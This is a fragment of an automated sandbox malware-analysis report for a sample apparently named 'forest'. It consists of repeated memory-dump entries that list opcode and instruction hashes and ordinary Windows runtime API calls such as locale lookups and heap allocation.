    • Associated: 00000000.00000002.2610683252.00007FF75BD90000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610698884.00007FF75BD91000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD92000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD95000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610745126.00007FF75BD97000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff75bcf0000_forest.jbxd
    Similarity
    • API ID: _invalid_parameter_noinfo_noreturn
    • String ID:
    • API String ID: 3668304517-0
    • Opcode ID: 5cf1311638112db07b927694fef8e6396ca2c9b095fa6c551ed0c097e664b80b
    • Instruction ID: ff126ad4c9f80483acf5e5ff9620b5f274ddd95c06a8f34c856e95722efc5e42
    • Opcode Fuzzy Hash: 5cf1311638112db07b927694fef8e6396ca2c9b095fa6c551ed0c097e664b80b
    • Instruction Fuzzy Hash: ECB1132260D78186EB289F29E05033DBBA1EB81BC8F984135DA9D077E5DF3DD491C7A0
    Memory Dump Source
    • Source File: 00000000.00000002.2610589653.00007FF75BCF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75BCF0000, based on PE: true
    • Associated: 00000000.00000002.2610571497.00007FF75BCF0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610644115.00007FF75BD76000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610683252.00007FF75BD90000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610698884.00007FF75BD91000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD92000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD95000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610745126.00007FF75BD97000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff75bcf0000_forest.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: f1e16e5d671d89c29f79eaeb6640cc837820a088961377a8c5a45492aa46f04c
    • Instruction ID: 9f52eb355a967608005f6b018a982d0dea39dc6d14c8e86e683e86e43c4938fa
    • Opcode Fuzzy Hash: f1e16e5d671d89c29f79eaeb6640cc837820a088961377a8c5a45492aa46f04c
    • Instruction Fuzzy Hash: FA51F822B04BC245FB54AF79A8446BEBBA0FB44794F984135EE5C27AA9DF3CD001C710
    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.2610589653.00007FF75BCF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75BCF0000, based on PE: true
    • Associated: 00000000.00000002.2610571497.00007FF75BCF0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610644115.00007FF75BD76000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610683252.00007FF75BD90000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610698884.00007FF75BD91000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD92000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD95000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610745126.00007FF75BD97000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff75bcf0000_forest.jbxd
    Similarity
    • API ID: ErrorLastValue$InfoLocale
    • String ID:
    • API String ID: 673564084-0
    • Opcode ID: e6cff381f708a6e4bed4a41e6150083fc0489feac95b7f7c59ea85fe37f47e98
    • Instruction ID: b151c87f77a23486604fd0930eb2c256ac3ad8f77d7e7d7f09a7036a1765668c
    • Opcode Fuzzy Hash: e6cff381f708a6e4bed4a41e6150083fc0489feac95b7f7c59ea85fe37f47e98
    • Instruction Fuzzy Hash: 00319A31B08BC246EB6CEF29D4413B9B391FB48744F988035DA9D876A6DF3CE8508710
    APIs
      • Part of subcall function 00007FF75BD5E1F0: GetLastError.KERNEL32 ref: 00007FF75BD5E1FF
      • Part of subcall function 00007FF75BD5E1F0: FlsGetValue.KERNEL32 ref: 00007FF75BD5E214
      • Part of subcall function 00007FF75BD5E1F0: SetLastError.KERNEL32 ref: 00007FF75BD5E29F
    • EnumSystemLocalesW.KERNEL32(?,?,?,00007FF75BD6B24B,?,00000000,00000092,?,?,00000000,?,00007FF75BD5C339), ref: 00007FF75BD6AAFE
    Memory Dump Source
    • Source File: 00000000.00000002.2610589653.00007FF75BCF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75BCF0000, based on PE: true
    • Associated: 00000000.00000002.2610571497.00007FF75BCF0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610644115.00007FF75BD76000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610683252.00007FF75BD90000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610698884.00007FF75BD91000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD92000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD95000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610745126.00007FF75BD97000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff75bcf0000_forest.jbxd
    Similarity
    • API ID: ErrorLast$EnumLocalesSystemValue
    • String ID:
    • API String ID: 3029459697-0
    • Opcode ID: 9e44754d9577773977ea80c74dd13d3e76b8718e7eff8b86a5b4e7f7b291e66c
    • Instruction ID: fd2e4871fbde7d3b159502ac46a35ed97b137fdbf035c8564cd8f5ad0ca5c272
    • Opcode Fuzzy Hash: 9e44754d9577773977ea80c74dd13d3e76b8718e7eff8b86a5b4e7f7b291e66c
    • Instruction Fuzzy Hash: 40112B63E18B8189EB18AF19D1406BCB7A1F744B90F988136C669833E0DE3CD9D1C750
    APIs
      • Part of subcall function 00007FF75BD5E1F0: GetLastError.KERNEL32 ref: 00007FF75BD5E1FF
      • Part of subcall function 00007FF75BD5E1F0: FlsGetValue.KERNEL32 ref: 00007FF75BD5E214
      • Part of subcall function 00007FF75BD5E1F0: SetLastError.KERNEL32 ref: 00007FF75BD5E29F
    • GetLocaleInfoW.KERNEL32(?,?,?,00007FF75BD6ADC5), ref: 00007FF75BD6B053
    Memory Dump Source
    • Source File: 00000000.00000002.2610589653.00007FF75BCF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75BCF0000, based on PE: true
    • Associated: 00000000.00000002.2610571497.00007FF75BCF0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610644115.00007FF75BD76000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610683252.00007FF75BD90000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610698884.00007FF75BD91000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD92000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD95000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610745126.00007FF75BD97000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff75bcf0000_forest.jbxd
    Similarity
    • API ID: ErrorLast$InfoLocaleValue
    • String ID:
    • API String ID: 3796814847-0
    • Opcode ID: 9d0b2ffe273e1f4fed17e8bd1c313f9a0eaebc25c880ac3e083329c0c2e7b654
    • Instruction ID: 51fca5fa27343446c6c0778a0f3d2c5ea06c5b629f101c8c8f6fadf038a25636
    • Opcode Fuzzy Hash: 9d0b2ffe273e1f4fed17e8bd1c313f9a0eaebc25c880ac3e083329c0c2e7b654
    • Instruction Fuzzy Hash: 12113D33E1CBD182E7687F29D082679A750EB49760F980131EB39036D5DE39D4808750
    APIs
      • Part of subcall function 00007FF75BD5E1F0: GetLastError.KERNEL32 ref: 00007FF75BD5E1FF
      • Part of subcall function 00007FF75BD5E1F0: FlsGetValue.KERNEL32 ref: 00007FF75BD5E214
      • Part of subcall function 00007FF75BD5E1F0: SetLastError.KERNEL32 ref: 00007FF75BD5E29F
    • EnumSystemLocalesW.KERNEL32(?,?,?,00007FF75BD6B207,?,00000000,00000092,?,?,00000000,?,00007FF75BD5C339), ref: 00007FF75BD6ABAE
    Memory Dump Source
    • Source File: 00000000.00000002.2610589653.00007FF75BCF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75BCF0000, based on PE: true
    • Associated: 00000000.00000002.2610571497.00007FF75BCF0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610644115.00007FF75BD76000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610683252.00007FF75BD90000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610698884.00007FF75BD91000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD92000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD95000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610745126.00007FF75BD97000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff75bcf0000_forest.jbxd
    Similarity
    • API ID: ErrorLast$EnumLocalesSystemValue
    • String ID:
    • API String ID: 3029459697-0
    • Opcode ID: 1ce044e3f162610a915e061ba3f10c3ddadf045fc0bdae90726c6ef4d55f6f45
    • Instruction ID: cbe95e4bcfb21cd3214e6ab37cf40df10f2d4c5620b4e249c9d668d611c5f9d0
    • Opcode Fuzzy Hash: 1ce044e3f162610a915e061ba3f10c3ddadf045fc0bdae90726c6ef4d55f6f45
    • Instruction Fuzzy Hash: C0012872F08BC146E7186F1DE4807B9F692EB547A4F988232D6A9032E5CF7C98808710
    APIs
    • EnumSystemLocalesW.KERNEL32(?,?,00000000,00007FF75BD5ECCB,?,?,?,?,?,?,?,?,00000000,00007FF75BD6A0AC), ref: 00007FF75BD5E8C7
    Memory Dump Source
    • Source File: 00000000.00000002.2610589653.00007FF75BCF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75BCF0000, based on PE: true
    • Associated: 00000000.00000002.2610571497.00007FF75BCF0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610644115.00007FF75BD76000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610683252.00007FF75BD90000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610698884.00007FF75BD91000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD92000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD95000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610745126.00007FF75BD97000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff75bcf0000_forest.jbxd
    Similarity
    • API ID: EnumLocalesSystem
    • String ID:
    • API String ID: 2099609381-0
    • Opcode ID: a93aaad4e12693b5b086b917930b389686b377b09538789090b40f77a9a41231
    • Instruction ID: 3df659ea6161f2e177913929db6a37386a56b0bf8536a41087a9839a4159932e
    • Opcode Fuzzy Hash: a93aaad4e12693b5b086b917930b389686b377b09538789090b40f77a9a41231
    • Instruction Fuzzy Hash: 1DF01976B08B4182E608EB29F8915B9B361FB98B80F988135EA5D833B5DF3CD5618750
    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.2610589653.00007FF75BCF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75BCF0000, based on PE: true
    • Associated: 00000000.00000002.2610571497.00007FF75BCF0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610644115.00007FF75BD76000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610683252.00007FF75BD90000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610698884.00007FF75BD91000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD92000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD95000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610745126.00007FF75BD97000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff75bcf0000_forest.jbxd
    Similarity
    • API ID: Time$FileSystem
    • String ID:
    • API String ID: 2086374402-0
    • Opcode ID: a456c08fd66bedc92f1f7b712d585804f300b2d44de510fd29d46df24d74b176
    • Instruction ID: 5ce0ebc3167bcf83dc9074d2ddba50d797d033bc1f7593f8e22fc0b5afa8eb8c
    • Opcode Fuzzy Hash: a456c08fd66bedc92f1f7b712d585804f300b2d44de510fd29d46df24d74b176
    • Instruction Fuzzy Hash: 19F0E2E2B29A4D43ED08A719D4943789291AF68BF4E485B31EE3E0E7E4FF1CD0498350
    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.2610589653.00007FF75BCF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75BCF0000, based on PE: true
    • Associated: 00000000.00000002.2610571497.00007FF75BCF0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610644115.00007FF75BD76000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610683252.00007FF75BD90000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610698884.00007FF75BD91000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD92000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD95000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610745126.00007FF75BD97000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff75bcf0000_forest.jbxd
    Similarity
    • API ID: InfoLocale
    • String ID:
    • API String ID: 2299586839-0
    • Opcode ID: 279ee8a56892539b6e38279104052b12bf163cd2e4b17823b0060956aba66d26
    • Instruction ID: a4e07f1bcdf39b60017e93c25026945c81a66be455bb8eaff706f667ff016cfb
    • Opcode Fuzzy Hash: 279ee8a56892539b6e38279104052b12bf163cd2e4b17823b0060956aba66d26
    • Instruction Fuzzy Hash: 8AF0827A92C28282E2AC671CC455B78D351FB40389F980131E10E827F4E92ED594D721
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2610589653.00007FF75BCF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75BCF0000, based on PE: true
    • Associated: 00000000.00000002.2610571497.00007FF75BCF0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610644115.00007FF75BD76000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610683252.00007FF75BD90000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610698884.00007FF75BD91000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD92000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD95000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610745126.00007FF75BD97000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff75bcf0000_forest.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID: 0-3916222277
    • Opcode ID: ec858bc19ed714e7eeef6413a995302f1d2c6f7ae2d18a35271f465804c9fbf8
    • Instruction ID: 0471116b34191317250d95bb519c7b336e9c1811ad7178c0b7f301d37142245e
    • Opcode Fuzzy Hash: ec858bc19ed714e7eeef6413a995302f1d2c6f7ae2d18a35271f465804c9fbf8
    • Instruction Fuzzy Hash: 56B16C72A09B8586E7699F2D805023CFBA0E706B48FAC0179CB4E473B6CF79D455C725
    APIs
    • GetLastError.KERNEL32 ref: 00007FF75BD66329
      • Part of subcall function 00007FF75BD5D5F8: HeapAlloc.KERNEL32(?,?,00000000,00007FF75BD5E3CA,?,?,8000000000000000,00007FF75BD51C85,?,?,?,?,00007FF75BD5DB64), ref: 00007FF75BD5D64D
      • Part of subcall function 00007FF75BD5DB30: HeapFree.KERNEL32 ref: 00007FF75BD5DB46
      • Part of subcall function 00007FF75BD5DB30: GetLastError.KERNEL32 ref: 00007FF75BD5DB50
      • Part of subcall function 00007FF75BD6E374: _invalid_parameter_noinfo.LIBCMT ref: 00007FF75BD6E3A7
    Memory Dump Source
    • Source File: 00000000.00000002.2610589653.00007FF75BCF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75BCF0000, based on PE: true
    • Associated: 00000000.00000002.2610571497.00007FF75BCF0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610644115.00007FF75BD76000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610683252.00007FF75BD90000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610698884.00007FF75BD91000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD92000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD95000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610745126.00007FF75BD97000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff75bcf0000_forest.jbxd
    Similarity
    • API ID: ErrorHeapLast$AllocFree_invalid_parameter_noinfo
    • String ID:
    • API String ID: 916656526-0
    • Opcode ID: f9b88f2107271149bc3535cc48857f35e922378b7ddc4875876bfe8fb7144504
    • Instruction ID: 575870dbe1a1266cee1d172d3d372fbfeaba560d723a1b05ca0d147cf9ca3dc5
    • Opcode Fuzzy Hash: f9b88f2107271149bc3535cc48857f35e922378b7ddc4875876bfe8fb7144504
    • Instruction Fuzzy Hash: 7F41C721B19B8341FA287F2A68517FAE6907F99780F8C4535DE8D47BD5EF3DE4408620
    Memory Dump Source
    • Source File: 00000000.00000002.2610589653.00007FF75BCF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75BCF0000, based on PE: true
    • Associated: 00000000.00000002.2610571497.00007FF75BCF0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610644115.00007FF75BD76000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610683252.00007FF75BD90000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610698884.00007FF75BD91000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD92000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD95000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610745126.00007FF75BD97000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff75bcf0000_forest.jbxd
    Similarity
    • API ID: _invalid_parameter_noinfo$AllocHeap
    • String ID:
    • API String ID: 443252259-0
    • Opcode ID: 6964823ca8642a5af7a9c54e1d0b42cb12e8f60dbf1da35b588f3f8206867df7
    • Instruction ID: f277f780d3895306e9ded8d5ca97aa254553fcb8ed979d0e91acd52164ca1395
    • Opcode Fuzzy Hash: 6964823ca8642a5af7a9c54e1d0b42cb12e8f60dbf1da35b588f3f8206867df7
    • Instruction Fuzzy Hash: C1020571F04B9641EF68EF2DC9451B9A3A5EB647E4F9C1271CE6E473F4CEA9D8028210
    Memory Dump Source
    • Source File: 00000000.00000002.2610589653.00007FF75BCF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75BCF0000, based on PE: true
    • Associated: 00000000.00000002.2610571497.00007FF75BCF0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610644115.00007FF75BD76000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610683252.00007FF75BD90000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610698884.00007FF75BD91000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD92000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD95000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610745126.00007FF75BD97000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff75bcf0000_forest.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 4822b5c2577af7dd3d9ceb3033f2715f059c44100626e067fb054da6d963c7ce
    • Instruction ID: b5ab60d12a47fccb04edf7199fd863dacfa0f4703586e2a9e8efbcc2b7642e43
    • Opcode Fuzzy Hash: 4822b5c2577af7dd3d9ceb3033f2715f059c44100626e067fb054da6d963c7ce
    • Instruction Fuzzy Hash: B3D1C532A0874686FB6DAF2D819027DA7A1EB05B88F9C4135CE4D476F5DF39E842C364
    Memory Dump Source
    • Source File: 00000000.00000002.2610589653.00007FF75BCF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75BCF0000, based on PE: true
    • Associated: 00000000.00000002.2610571497.00007FF75BCF0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610644115.00007FF75BD76000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610683252.00007FF75BD90000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610698884.00007FF75BD91000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD92000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD95000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610745126.00007FF75BD97000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff75bcf0000_forest.jbxd
    Similarity
    • API ID: ErrorLastNameTranslate$CodePageValidValue_invalid_parameter_noinfo
    • String ID:
    • API String ID: 4023145424-0
    • Opcode ID: ce827e23b5fb9fb048f2fdd3c7457ec4e9fb83c6efa7c177d8ecfdf58fe21a12
    • Instruction ID: 180ae489f79495b005158e7b120ee1fccb051d93b524d35f96d6a1d8361a717b
    • Opcode Fuzzy Hash: ce827e23b5fb9fb048f2fdd3c7457ec4e9fb83c6efa7c177d8ecfdf58fe21a12
    • Instruction Fuzzy Hash: E0C10B62A0978A45EB68AB69D4907BEA7A0FB94788FCC4031DE4D876E4DF3CE540C710
    Memory Dump Source
    • Source File: 00000000.00000002.2610589653.00007FF75BCF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75BCF0000, based on PE: true
    • Associated: 00000000.00000002.2610571497.00007FF75BCF0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610644115.00007FF75BD76000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610683252.00007FF75BD90000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610698884.00007FF75BD91000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD92000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD95000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610745126.00007FF75BD97000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff75bcf0000_forest.jbxd
    Similarity
    • API ID: ErrorLastValue$CurrentFeatureInfoLocalePresentProcessProcessor
    • String ID:
    • API String ID: 2071376764-0
    • Opcode ID: e12076cdc0c0cdc7fe1b0f0b1b4ad132a50841606ac88c01f83246212a4c5ec9
    • Instruction ID: c935fbc7a180e6dcaa2f0bd38edff28adfcbb90e058851171a8fb06fd33c1be0
    • Opcode Fuzzy Hash: e12076cdc0c0cdc7fe1b0f0b1b4ad132a50841606ac88c01f83246212a4c5ec9
    • Instruction Fuzzy Hash: A9B10C32A18B8642E768FF29D4016B9B390FB58B88F984131DE8D836D5DF3CE951C760
    Memory Dump Source
    • Source File: 00000000.00000002.2610589653.00007FF75BCF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75BCF0000, based on PE: true
    • Associated: 00000000.00000002.2610571497.00007FF75BCF0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610644115.00007FF75BD76000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610683252.00007FF75BD90000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610698884.00007FF75BD91000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD92000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD95000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610745126.00007FF75BD97000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff75bcf0000_forest.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 1482580fe5820d1ed51b21129fc6c885640b63bc2115ddbd9026485005cb11b0
    • Instruction ID: 83ecb1b730d4bce3d7fb57d08226d1e3d19d514f74689921c4e988f6f0a6a132
    • Opcode Fuzzy Hash: 1482580fe5820d1ed51b21129fc6c885640b63bc2115ddbd9026485005cb11b0
    • Instruction Fuzzy Hash: 4791A522B09B9695FB19EB69C4501BCA7A1EF44BD8F988031DE0D177A4DF3AD491C320
    Memory Dump Source
    • Source File: 00000000.00000002.2610589653.00007FF75BCF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75BCF0000, based on PE: true
    • Associated: 00000000.00000002.2610571497.00007FF75BCF0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610644115.00007FF75BD76000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610683252.00007FF75BD90000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610698884.00007FF75BD91000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD92000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD95000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610745126.00007FF75BD97000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff75bcf0000_forest.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 64db8b3930721d7cd7e68643915407db51066f5bba8df27865b8459d2248eb55
    • Instruction ID: 2ee16bbdaf182cdba6fbf47e54da5b33d28853f359d88e7bcf4223c9a4d4cf5e
    • Opcode Fuzzy Hash: 64db8b3930721d7cd7e68643915407db51066f5bba8df27865b8459d2248eb55
    • Instruction Fuzzy Hash: 2B91C526B097D685FB68EB69C4501BCA7A1EF45B98F984035DE0D17BA4DF3ADC81C320
    Memory Dump Source
    • Source File: 00000000.00000002.2610589653.00007FF75BCF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75BCF0000, based on PE: true
    • Associated: 00000000.00000002.2610571497.00007FF75BCF0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610644115.00007FF75BD76000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610683252.00007FF75BD90000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610698884.00007FF75BD91000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD92000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD95000.00000004.00000001.01000000.00000003.sdmpDownload File
